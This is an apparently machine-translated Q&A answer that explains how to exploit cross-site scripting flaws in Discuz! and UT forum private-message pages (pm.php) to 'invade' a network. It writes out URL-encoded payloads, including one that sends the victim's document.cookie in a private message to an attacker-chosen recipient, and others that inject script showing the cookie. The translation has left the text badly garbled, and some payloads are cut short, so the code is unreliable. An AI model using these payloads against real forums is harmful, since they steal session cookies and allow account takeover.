What are the loopholes in the current dynamic forum? How to use these vulnerabilities to invade the mobile network?

In discuz! Subject of post, reply, PM, etc. Is not filtered, so you can also add code. For example /forum/pm.php? action=send%22，false)； var % 20 forms = % 22 pmsubmit = Submit % 22 . tolowercase()% 2B % 22% 26 msgto = XXXXX % 26 subject = cookie % 26 save outbox = 0% 26 message = % 22% 2 be scape(documents . cookie)； req . setrequestheader(% 22 content-length % 22，forms . length)% 3 breq . setrequestheader(% 22 content-TYPE % 22，% 22 application/x-www-form-urlencoded % 22)。 Req.send (form); Found% 3c/script% 3e% 3cb% 22 [/img] discuz! Script vulnerability of UT cross-domain site-The vulnerability of SMS script on cross-domain site is a very common vulnerability. Please refer to: /phpbbs/pm.php for details? Action = send & ampUsername=name statement, but the name is displayed directly on the page where the short message is sent without filtering, which opens the door for stealing cookie or more serious damage. Discuz！ 3.x has been changed to /pm.php? Action = Send & Statements like uid=XXXX avoid this vulnerability, but are not filtered when selecting SMS folders. The above vulnerability example /phpbbs/pm.php is also generated? Action = s ... d & username = name% 22% 3e% 3c script% 3e alert (document. Cookie)% 3c/script% 3e% 3cb% 22 [/URL], the above example is to display your own cookie. (For Discuz! 1.X Discuz！ 2.X) /pm.php？ Folder = Inbox% 22% 3e% 3 ... Transcript% 3e% 3cb% Show your cookie. (For Discuz! 3.X) UT has been filtered on the topic, which means that %27 has been converted into'; But its recipients are not filtered, so there are similar vulnerabilities. The example is abbreviated. (Different UT forums have different codes, but they all have similar vulnerabilities in general. )

Hope to adopt